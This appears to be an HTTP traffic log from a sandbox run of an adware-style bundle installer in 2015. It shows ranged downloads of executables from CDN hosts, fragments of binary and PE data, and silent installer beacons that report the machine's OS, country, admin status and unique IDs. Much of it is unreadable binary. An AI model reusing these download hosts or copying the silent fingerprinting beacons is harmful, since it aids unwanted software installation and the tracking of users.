....Y...L)....1u..'...G5...F?._c/z..9%*......R.._~.;..-Q....`:..U-....
....O..w._.}.F.........Fx/}`D.-"c.m.}..x...;.*...,.).e.(..}%. .m...3..
v6Y..AA.l..v..t...|8.F....9.._.[.BX{U~a...n...u.......T6..d....A*...9u
..=..p..4.~;RgD..E\....`1.uap.*..2z...O...>a.8......P...y6,.N0..A..
..9.}...Jk.S.rO..B..{......]..e../...R_.h....&.....UL..E.S.Q.m=^..r;.W
~.....`......S.#gF.Zw..[`.%....G...y:U.....b.N~..0o..p.......1..Y. ..E
....'.....zG?...p....:xt.x.$.h.(.../.%`l!a...]S.V..v...b8..g..(....Z..
[email protected]._]..d...>...n.iR...k.s..2.sPR....Q.>a@{..p.,..-..;...g
.Q.e..b{..E...s.o.._Lc......B.G=..B...r........8.....M{\.]...t..$md.&l
t;..P..Ad..j....i..R.XD..w<...a3_.g.....G........A..A..3X.......G..
...Z.|v..0Y.YSr).....'{m0..K.P.{...N.3..n.,.{e..5J......u0"r$@_.J.._.*
..N>?...W...k.12.p..sS..v#C....UD.:9.E...i.`.q4a*s....4,..4f.......
[email protected] .*:48`z..0.d./....oi.Y1g(].V...N....8.
X.......i.{(..^.....|.B.":.h.....`^..Yl.-..... .t.Y..3.........T.qM.a.
.......O#7.ll.....<.m.....P.n...{.(38..;-n.......Nm..k....kK.<..
..0..}...:..-Y`i....l<.T$0..=9...o`.&.z..l.h..R ....tQ....RG...l|..
..W....9..........u.w.vhI....%...v...Ea.';.6v....m.H....L.z.[CeJb1.|ZY
N/.3...E...M..k.t...C.~.p.u..7...k...N.${... 3..m.....,@..J#....Z.P...
...s$..fE.0...&.....9Y.`c..[.vC0)....D...2(.:..:[email protected]"2.63`.
..::..y.Mx.C..-...?........_#.O.."&^.$...Aa.<...."*..............@.
.....3D.aR..L..>j...(.._Jp~...6...S93P.d'....J,.j~A.}.....cH..\ ...
.t&..k......m>..3..B8..oLj....3.A...1E.l3...B...g.2K..@[\.V....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6500000-6749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6500000-6749999/7202264
......w9....6...Z....o..Vj...6....m../_.6fm.;]=y......)bq..........?.f
....N.H........Z_..E.........f.....,d'...t...y..".;5`.......'H.....D_.
.x.r..cL....c......}....b._.N.x-.R: ...`G\...)m..7......21>v..Fwn.#
.....H .)..dE..d.s..xu...].Z...."@...Ee$=&......oB.............V.GT.h.
...W..o&..z.P....#...E..48..r......a...Ls..].'45.Nx..$.c..-...j)3....A
....O...Q|[email protected];...sUT.~F..*..%_...}%....6;........e..t
....|.....S..M.t.]..........2.'...P.:_.J."...h..%.....B.....E$...$..`.
.k.f.&C.._.6.J.....;.Qft.t\-(...'../.:....-.....<..."..C.....lO....
...s.o.2...N...1....0..!.K..6.~..[....8.......,}S.;Vy...q....j..8..U.B
.Zr.`..Gc.".lhWU...#.5..#CJ0...0As..%xvIv..Jsf.V,PH3..8-.....?..c|-...
.!.PW...J....>1...|=.......;.,|..p...q..J....).H.T.`......Z./ofB54G
.K.......X.8{,PY......F.....e._\.9..KL.....e....v.K..j.6.L....6{......
.......|....V......R.tP................o..3IHZ|.2...CV..H..`>.[....
...om.........=..K..5.i..=B^[email protected]...'..~..:2....<.E..wx...
|..!(...G...>F9b..w@_..`L. .. T.../..]-..pr.?..~.........i...9.T..Y
`W.J.......7.uE....4V.......7..8J........b...)..h.0..n ..Aj.Y.q...U.e.
..........C>........M..<.Jzz........p:(..{l....]%k.,.TJ\..GV3...
..n17...........w.......Q.>...;pK.u..F..9.s.%.&...=u.5g....Y.A.M...
..*{.......#..*..8.P\n...Nks5. j@.....(....U!...|a%{.......E.<8i...
.n.I...p.......T<..F.f....M..T.=.pIdnT;.....eH...n.}......=........
..<.....;.BW....k.6).D.fr.`......1E. E.|.v..!.........MO...l.......
[email protected].}..........#.r........d,...~.....b4R.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6750000-6999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6750000-6999999/7202264
[email protected].}_R.2...._*)..........K.X(..|>.....P..`.).Ii Y.\.
.....K.<v....~`r.`[x..........U./W.p} F.....KHv.IU?..5oJ..{..b....B
n.....u...=67....u..QY.5....X\..f.!...u...>.D...O......(. ....3.L..
..Z)..V..m.n.L.....#}a...j..6.G$.J.......S.*jf..f._..5.6sWS.k..<...
.E8.;A...[. i.....<.d.m..~hd.....Z.y]x......"0.s.......c.1.(0 .h'u.
e . .(7.XT.z.(A.H9>..........7U......8X~...a4.:]-A..*.n...a...%M..-
..x..|{,...ct....,...V}\...~DQI../...H..h.L..oP.].1.a...S..p....`...z.
.K.&Ft.......P...|....c7.[p]....=.#]W...&.ils=......6...$....Bv.W.3L.,
<.wqAd...........A.\....ya..H.hk..4. ........R...x0...4\..7-]......
..tu.z&"&&`.67..Fu.n.r...0c....F...NF<....).;...4...3Nl.c.q...JfO.?
......3AD7..p.. >......d. <{...'Y]..@..%L8.b%;.N....(>..q...V
..$......i;...y?Y.fc.`......kz..U...H...5R.{m..........K.#{V......./..
.....6}v...8{|.S7/......f._..5....y...i.A.}.,.....i....](k....O..i$d..
..,@0...V../.&.C{...Y4.^.....@;.6Z...at.-M..pw....A.:.Qb/...H.e536..^z
[email protected].^j..H.~.....#....5.b%..._.V..........F.)...
...vU.....="b?.....[5D.C....,Y.........lH....].K...n...|.....|.....bZ.
_@.../be......*WM...g...J..,.;........A.<...jt........<...e .l.C
...q].....}....9.Qj./J.&..k..$'SI..*o....X.......S....XSOn.c.......J..
..... 3C..F.m..$.w.\....%.$.=L{R.aI.].W..........n....t.........<.@
.... #d2Y)..2.w~.......`...S... .........O...6...P..I...S..4..8.h.6n7.
..H.6..cr......W}.1.z..B..[.8...y-....d..X..%{...X}._..(.P.g;.r...:,Wa
..0..e;L.b.:.g .6.q..............K..............qu.Z.,@..>.~.F.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=7000000-7202263

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Type: application/octet-stream

Content-Length: 202264

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 7000000-7202263/7202264
.........).Q#>R<..D.D.T.;Z. ..]G<G.P....N4.8......3J<.....
z.....r..,...LNi....*.ES...<..Y............g... .....z......._...9.
..Y....K.|...V:..R.H...........(...K.bRP.........Z..[...l...U>K U7.
~...^4[ ..I.}..Kt4k.....7B.|`.....*....Nf.{=.H.b.hSM.{ ..i..>.Fg..&
gt;`..WEM...RXu...D.?........NaU.^...U...}#.%.R..C.v.'.<..K.q{....N
.mp.t.]...bt.1.z.;...vAI...4K..iX...........!...RV...y{..'............
...e..MB,.......(=.i.Y....1m..F.m.>d.W..5...t...7..I.Z..U&V..;yM...
...2.@.]KM9...J..i.D6....4T.X['G,W.`......Z...x.J...7yE...\.9.uQ.z.<
;:..:D...E[..D..!......t....B......\I...s$.f....R.....J......... |..g`
5ye.O...>l...F..|\...l.1.#.-M.1.&..l.[B.k.,.>..A..9....]Y=_.|!?p
 ......[.[.......a.. ..1....w!..Z..F49.e=Ggd<.[./...U~V...^...e....
.T... .....3...zj_...R...r...........O.I.ksk.zm..,S\.....[F.R~m.?..Q.o
.zx.^.)]...22x ..*...2l...oIJ..g.....iy..VY.t.U..15:.v..4..bA.4.SP..&g
t;.....~-..f........o:..G){s.e..j......d;.....e..}.A. .2.[..h..t .....
....?.]..S.R.*.{..;...B.X~.P\[email protected]....];X.....Vg...G.<
;..x.d ..lgtE..........m..p.......ZX..k.5.u*.mh..kr...v6.....`5..8J...
.....)....F.. .gb.V-.Y.../...<$.o'....Wzt~..-....x..beh..0[.z|D.N..
...I.ir].{...dlp4.D.....-...W.:.B..5.Z....`.............6.u.%..W.{....
M....b.......\}q.......}.5.OCa.} .. .&:j|.........:.~mB.y..&.......VX.
........x..n...K...._^A9...)......9{~.VMv.1.......w...r....{.....7vj..
9..v.V.yd..N.C..AkI... .b..e...g..u..&..'z|...5..:&*.A...,?..e...]*..c
..C4..o....D............. ...;=....C...4H.("...Z....E{..t.O...L"..<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5014

Content-Range: bytes 250000-499999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xW1do1SQ9fZdcEpHVsemBxLnQIjHb9Hm8tU3B495FY3KxSDgNw2Bvg==
.U......k.q.&.hy.[.v ..........J....Ie.{......A../....Ld....Q.....:.W.
.~g.c0.$.... .B*.m.ES..N._..s.blW.....zz..v......(.k...=......G.....8b
...M..~j.......mD....}.....q..Yd.2...15.=t.H.MlLGo..ti.?Ot...1..h.....
.....j_..G.~.|..2:!]mP. .."R.c~u1..4.>J.f....N..?g{E...=.....^[....
.W...O..Y56........q..t...:J.q.s.....O..d...]...'M..i.oDe lht....B...#
.....s[.Qg..22}...(..2..b.;7......|...R..GP...LA......AI*.........r.T.
T.D..D.{.0.......:..Y......M.Z..{oW..k.85....#e.GU...i..\$.M.P........
a.u..C...$...../..u.....j,....f;.|..e........$........b..-;......[....
.x._...E.".?...,...|w.....B...... &.A...X.7.d.7..p.....1t....|.b...,;.
.E........mU.T.m.p5.mo..d?...(......!.:..15.[.UH$h.......(4'.-U7.....K
B..........E..`....j5........R...`.l.Z.....]......>...%....7.....yQ
8.....h..N.o .......F8[.\.1...."../.*.5L........%.Sd...qAai.....t@Eo.&
.T.E.......uM..UE.x4..Z4&..I.S.....X.E../.....E|...;..3.t.|.......(0..
...5...&.4/.l&y.a.......U$/...x...)............g........Z..g..`9...&..
~m..d.]..e.l#.....C<..>[email protected].:7.c"T...?....2p.
..... ..vl....}....k}...Jk....>..aT..q..).X..aU.t".!w. ..D4.>.wc
.*...[l....B.....m.n.......y.....g4.......G ..,@\.e8...C<\l.N..S...
E....Zo...G.^]...[...d.:.S!@y~.!..Xi.......u.q. .o..X....@(.&c.fg.B...
.$. ...>.EXr{......$oFM.2....Q.V..B..M..........l.?.@E...."_..2W.P.
...=.R.....Z"G. ..".3......_....zO,.~..P(....!.,.....K.E.Z..)....8....
P.(..T%..p.?..-. ...~.5..c.....f..S...A.. G.3E...$..0.ge.Z.n{v.k.... .
Yz..K......A ........%.&.u.&.].J.vr.....-a.......O......=....?... <<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5015

Content-Range: bytes 750000-999999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6DytyooetEIG7Me3havBSPSVHKj_v-claGIvZ-ros2l9YCvYahRPwQ==
^Q.......4)..I..}...]7....... K..rE2jIS.......^.........5d.G....k.l..=
.."<.p...[.R}....)..O0//g.6.u.{.=.#..$....T...!.T...9..u..._.......
..../...DB..ls...D..u..>..?~....^1a.Fi....2..).(.d.y...#.G...^~#^..
.yY]...9...[.t{..m.....w{.....R.`.)}......m.E...t...Lq=.v..N....H.O...
.6..?.jSz..nC..;...1...Z..x...-..U...au.8|.~v1=.d.}.....Q...X0.(lJ.H~$
[email protected]\.A1..b._.....B..Kg.ml......fX.........".......1 .._.....b.Sc}
*.Io.81p..E...=............,.^P.f=.B........9p..3.*..i;%._..x......E..
.G.Yo.#.m.k..-`.;.|..X..NE.....V....&a.U..Q.z.1.X...j...j.7.*..S....&l
t;..q.S|....a.\.cv.|.....{BaA.~....>Z.VBI......w...M.W.......V.....
..,...G...~U T.......X........ TR.Qd.....J..'8.t...D.....k.\g=.Z.7.W..
.....{..K..{;..d.N.j..E..%.,....>[email protected]....=>
.v...$.?."QT......bg....X>. ..k."aY....l...u;Y.&..\#..&A..`...p...;
h...3.m.d.i.....u.X...!...b%)zb_.H}.x...A...<....U1. U.Q.@........^
....6BTCr...#.a.. }..i....o...S:.v.Ql.....Z.O..g.....[.."`z.. tH.p....
...y..f..0'..~MI.......k.....u1>.Dw.T.....Y.. `.....'..>.\..r.T^
..4S.I. ..yb.P.F.O...Z.U.Yi:[email protected]>...6|).0K...3....d..y.`....
.7L.O.......<Dqu..|......C.f..B.R.x!....t...!.Hg.:h..t=...-:.v\w6.?
rh..}CI..o......H8.`y..J..?..S..2..h.8h. :[email protected].{..W
.Nf.`!g.....)B-/...f.c....d. .E......'.Z2..aL.|...F....u....j R..)....
LH .1..........{.i...G..T.y...'..L....z:..........7M.....t<.\...s..
a:..d0.V...]D..5.r..Mg#.3r.W...>..mA`..0.,3.h.........E.....u......
.e.T...A..c. ....C..?....R 0.?..&.........h.....KZ.w.......:.....D<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 05:30:43 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5015

Content-Range: bytes 1250000-1499999/2707440

X-Cache: Hit from cloudfront

Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0DWJlOvGWUCiz5pdcI5-A9cLtrKLs-NkLX3FMZMtWmM-ZP9AMh4QCg==
..h :q4T........&jxQ.C3f..p6.....V.'.$C,<_.f...ML...D..h.....Q...D*
./o..-.f.@.^.&..G."..J;h..e.gd...t....t6.`Wr.%L..........RV...=....w1T
.1...0..ZF...............$...by...'5.^..dPJ!.r.......I. [email protected].(MJK...
o:I..c...s;i..o.v.vl..(.L.[...Lx.BT....[..^q..........,.{T.l.u3.)..Y..
.w.|V.....$.@[email protected].&lp.....uY...`." e...~>..S...3I...._Z?k.A.fK.#.
. .wp.I7...........G....*.....y....$}.I S..S.L|L...... ....v....K..S..
.....3.....&...2;...R1....f.....H......g|...Z... ..m...c...(...`...AM.
9..../R.....q# YD.N.Q..>t..J........`.....~o..c............M.]w5...
.....J..,..9..H..@...(f.O4l.CBg...,..dN.U ..4....w..2<.m..? ...'.,.
...E.....L...O0*S.............Jf...>w.2D....`......38.......w.Qx@..
...8N..BU.$.k.........N......=....A..ez*....d.. \.!.:..`..k...5=p....Z
u..$..M.. ....|b;.dm..7.Y2Y.0.cx!.Q..[...FZ...v..)...9*.sJ..u.....C..2
..$..JC:,....^..S...N...|.......A6.z..Y......0..<..{./.-.*.5w>.d
...V.~.......tg.....Jp.KD1../.t.....7...al1.\.......uGXE...x.c....c...
M.&k=kQ..P.;....}....6FG...u..S.hF6..."T`..?.8..-..9.c.:.G...j..?.%.._
.U...YH!....(.:R..]..d>G....._..0_<p....F^....uQ~...,..N..g.T2.o
[,K.hJ^r...*.H.......Uq4..~...L.......F.......r...6S#......w.l...Q..7a
. 9.....W...jL.....H}A....wa.gqx~T.w.....kh;H.L ...0..........o.@L,...
....E!...'.....|.L...7....mjy...4. ..9;....2...Hh..d.y..r......0.....;
ajC..B U....e...s,L..K..`z.>.tu.LY..T....^ X.....M..4...._9......,.
...x..........v..EHBk........:.Yj.iv.. .z..>.iW..5.....g.4...k^~W.e
Z...U..6... e~Ui..WK7pGM...z........~1L2..J.....U...3....5X.>.~<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 06:54:18 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1750000-1999999/2707440

X-Cache: Miss from cloudfront

Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (CloudFront)

X-Amz-Cf-Id: mTxTTdnHleeEskrKLWYjdqDSuM1Mf_momDGgOcfhkiFDUp0Q948Jfg==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Tue, 08 Sep 2015
 06:54:18 GMT..Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT..ETag: "c6
05c91aadcbb1556cc6923f21bf4eac"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 1750000-1999999/2707440..X-Cache: Miss from cl
oudfront..Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: mTxTTdnHleeEskrKLWYjdqDSuM1Mf_momDGgOcfhkiFDUp
0Q948Jfg==..{...O......'..H.C.uq.7..:..W..=..-.z..B..T../#..~\.....R[.
}9........,E.yzzX%B...A.......#|./&.I2e.$r.....E>......fx;..... .n.
u.. .,'[,.u.....N..G.c.yB8{zW...jQ..&u.....I.2..4.J4.kKg....A7..P.....
F.mZa......E.u.......l..4......y<...^.....8]...).5...\_..B.G..X....
..'U..>{wY........x`EY:....V.....X....xRB.a^....w9-.........T$.G...
.."-/...2.<..!.1..z*....g1p.s<..'...u3I......'........&. [email protected].?.
A..(..|.....N.K.H....)Zq....j..V..S..f.....o.}..t..Z....].......~.xf..
3Ey..../=.|dJ....a.6..6..0....N.v).uO...}/...<..........j.|X..=._..
....Q.m2.....i...c...h....6..E#P.D..z.L.|[.<....v..o...',J.......1.
...0..Y.\a..,..8....=.c..0.R........x.Bb.|.b...D2........W.X..h^......
...xY4.{....u.?&U.2....[.GI..g.s..S...f.a..J.......o=.L.......x.7..|.v
..uNcu~^L.k.Tmv..(.J.r.t..T.A>..j.*.z..O........&.dy.j...Orx.....M.
.3...='..l#W.eI...........M..sT. ...s~c2......... ...d.`...XA{...z....
.....s.a6...'.F.....0..sA1..-.....=...<x..3%[...l....'S....m...d...
.<U.#~...e$....7n..AmT......n._.j....#...H..f.y....@O_1..q.....<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Tue, 08 Sep 2015 06:54:19 GMT

Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT

ETag: "c605c91aadcbb1556cc6923f21bf4eac"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2000000-2249999/2707440

X-Cache: Miss from cloudfront

Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (CloudFront)

X-Amz-Cf-Id: QZJhNTbVy2AZuuye9sMCngfY4un_HTn-gEnUEAHabwx4dsx-0otj5g==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Tue, 08 Sep 2015
 06:54:19 GMT..Last-Modified: Tue, 08 Sep 2015 05:20:17 GMT..ETag: "c6
05c91aadcbb1556cc6923f21bf4eac"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 2000000-2249999/2707440..X-Cache: Miss from cl
oudfront..Via: 1.1 f96185b1d69d6f85635bc2b5554da639.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: QZJhNTbVy2AZuuye9sMCngfY4un_HTn-gEnUEAHabwx4ds
x-0otj5g==...O....A.........%.....TZ.\d.60.e.'.R=U.?.......&..r.*?..G.
....Sm]u.o...gw.Q.G..Sd............. .)...9\_......am.........-o..;Ap.
`.%.o.....d..X^..z..?s.~..l.....w<.hq_.....5|....#....G.0[.0...2CGB
..5...]`K7L.U.*s..^.-.<L#....FEjx.X7.B...V<Oic`x....i..f..VW..z.
....$h.0kv.......s.....`^.....T.`..>[email protected]..#....t.....
N.K...R...&....e...pW~.?......C ... .=.........p$Od.f...yW...0LEI.pVzE
A.i`..4.H..[.5.?......h.%a>..<.$.5Uf.N#...f....K...Y..V:u.....YT
.....r....7.$... .JM..^...z...%Fs,qC....?.(...}.o..,...W..F..6.p.t0...
.p*..8R;...t.....~dW.C.x......E:..n...kBo...'.....ji.q.g.5Y..".......S
V.W...6|.B...KB.....(............9G.n..A..n..[...P#./.6.......%.Zb.j..
..@?....7........k..I..c..`..3...K. BJ~...B.....r.dX.(.'.?....PC.j.}E.
z...hDy.q.I..~.^..6.:!.\H../...l?uTo.7.. H..J.A...Y.....:.N.......T...
......^.GA...DM...=...fd...'.n...C.N.........%..|f..!.&T......zW....h.
.. ...D.R.....Y_0..4.)*#.O. .`.....^k:..`b...w..7.p._......T.K.....#%.
...B.<[email protected]_..CW...}[email protected]<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=7088 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:58 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.keybufferbox.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:15 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441676874"

Last-Modified: Tue, 08 Sep 2015 01:47:54 GMT

Cache-Control: max-age=3355

Content-Length: 224256

Content-Range: bytes 0-224255/224256

Content-Type: application/x-msdownload

X-HW: 1441695256.dop001.fr7.t,1441695255.cds015.fr7.c

Content-Disposition: attachment; filename="setup.exe"

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1.S.u}=.u}=.
u}=.|...p}=.u}<.|}=.x/..t}=.x/..t}=.Richu}=........................
.PE..L...rt.T..................................... ....@..............
............0..............................................` ..<...
......................................................................
........... ..,............................text...[...................
........ ..`.rdata..n.... ......................@..@..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U.........E........E
.....E..}.....}......k.....`......h......`...Pj.... @.j.h....j.j.j.h..
.@hR @.... @..E...., @..M..U.....U..N @..E.j.h....j.j.j.h......`...Q..
. @..E.j.j..U.R.E.P... @..E......E........M.....M..U.;U.}Mj..E.Pj..M.Q
.U.R... @..E.%....y.H...@.... @...U.3..U.j..E.Pj..M.Q.U.R... @....E.P.
.. @.j.j.... @.PhR @.j.j...$ @.j.... @.3...]..........................
......................................................................
..................................................................

<<< skipped >>>

GET /installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695305&procruntime=8&rnd=1441695313 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Xj71ry9819egFlDsRW0Vg6cmjUH9VY 8qvsguBc3tGU0oEeW8rTcuRuNkCG6AxYH

x-amz-request-id: DCBD5883D7707EE7

Date: Tue, 08 Sep 2015 06:55:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Xj71ry
9819egFlDsRW0Vg6cmjUH9VY 8qvsguBc3tGU0oEeW8rTcuRuNkCG6AxYH..x-amz-requ
est-id: DCBD5883D7707EE7..Date: Tue, 08 Sep 2015 06:55:11 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

